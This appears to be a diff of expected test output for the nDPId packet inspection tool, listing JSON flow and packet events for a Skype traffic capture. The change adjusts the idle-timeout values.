-00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642444,"flow_last_seen":1431969642444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642444,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431969642444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642444,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ldAAEAGhorAqAEinTh+08NsAbvs\/oHsAAAAALAC\/\/9bSwAAAgQFtAEDAwUBAQgKPiKLpgAAAAAEAgAA"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431969642469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642469,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIpxCw2oyvdjRgJS+lKASOJDQnQAAAgQFrAQCCApNl5tJPiKLPAEDAwk="} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1431969642469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642469,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MzFAAEAGJXDAqAEiQTffIcNqnEKAlL6UMr3Y0oAQECwnRgAAAQEICj4ii75Nl5tJ"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431969642519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969642519,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4WGRAAHYGzoWdOH7TwKgBIgG7w2wloWLk7P6B7ZASIACkPAAAAgQFrAQCCAoZLBplPiKLpg=="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431969642519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642519,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00kpAAEAGiqPAqAEinTh+08NsAbvs\/oHtJaFi5YAQ\/\/\/eqAAAAQEICj4ii\/AZLBpl"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431969642433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642433,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGIPEX30kiwKgBIgG7w2sxgMP95JI3k6ASOJD6qQAAAgQFrAQCCAr301nQPiKLYwEDAwU="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431969642434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642434,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0zNJAAEAGSybAqAEiF99JIsNrAbvkkjeTMYDD\/oAQECxRlwAAAQEICj4ii5z301nQ"} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642444,"flow_last_seen":1431969642444,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642444,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431969642444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642444,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ldAAEAGhorAqAEinTh+08NsAbvs\/oHsAAAAALAC\/\/9bSwAAAgQFtAEDAwUBAQgKPiKLpgAAAAAEAgAA"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431969642469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642469,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIpxCw2oyvdjRgJS+lKASOJDQnQAAAgQFrAQCCApNl5tJPiKLPAEDAwk="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1431969642469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642469,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MzFAAEAGJXDAqAEiQTffIcNqnEKAlL6UMr3Y0oAQECwnRgAAAQEICj4ii75Nl5tJ"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431969642519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969642519,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4WGRAAHYGzoWdOH7TwKgBIgG7w2wloWLk7P6B7ZASIACkPAAAAgQFrAQCCAoZLBplPiKLpg=="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431969642519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642519,"pkt":"0NQSxnP1PBXCt3IOCABFAAA00kpAAEAGiqPAqAEinTh+08NsAbvs\/oHtJaFi5YAQ\/\/\/eqAAAAQEICj4ii\/AZLBpl"} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642444,"flow_last_seen":1431969642548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969642548,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01400{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642444,"flow_last_seen":1431969642708,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431969642708,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431969642969,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969642969,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6a7MAAEARi4zAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642969,"flow_last_seen":1431969642969,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969642969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -65,11 +65,11 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431969643044,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643044,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZzYAAEARkAPAqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431969643092,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969643092,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1yqcAQLnbD6CBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAgABBfOIaY="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969643092,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643093,"flow_last_seen":1431969643093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643093,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431969643093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643093,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi9JAAEAGs6fAqAEiF84hpsNtAbuewXptAAAAALAC\/\/+RHQAAAgQFtAEDAwUBAQgKPiKOJwAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431969643139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969643139,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w20Yoc3insF6bqASOJBNnAAAAgQFrAQCCArsLkk6PiKOJwEDAwU="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431969643139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969643139,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z0xAAEAGcDnAqAEiF84hpsNtAbuewXpuGKHN44AQECyklQAAAQEICj4ijlTsLkk6"} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643093,"flow_last_seen":1431969643093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643093,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431969643093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643093,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi9JAAEAGs6fAqAEiF84hpsNtAbuewXptAAAAALAC\/\/+RHQAAAgQFtAEDAwUBAQgKPiKOJwAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431969643139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969643139,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w20Yoc3insF6bqASOJBNnAAAAgQFrAQCCArsLkk6PiKOJwEDAwU="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431969643139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969643139,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z0xAAEAGcDnAqAEiF84hpsNtAbuewXpuGKHN44AQECyklQAAAQEICj4ijlTsLkk6"} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABDNYcAAEARwa\/AqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABD3H8AAEARGrfAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431969643343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969643343,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7eVIAAEARfezAqAEiwKgBAdR8ADUAJ+nL8sABAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} 
@@ -78,8 +78,8 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1431969643343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969643343,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+7pYAAEARCKXAqAEiwKgBAf4VADUAKsDYd8YBAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAABwAAQ=="} 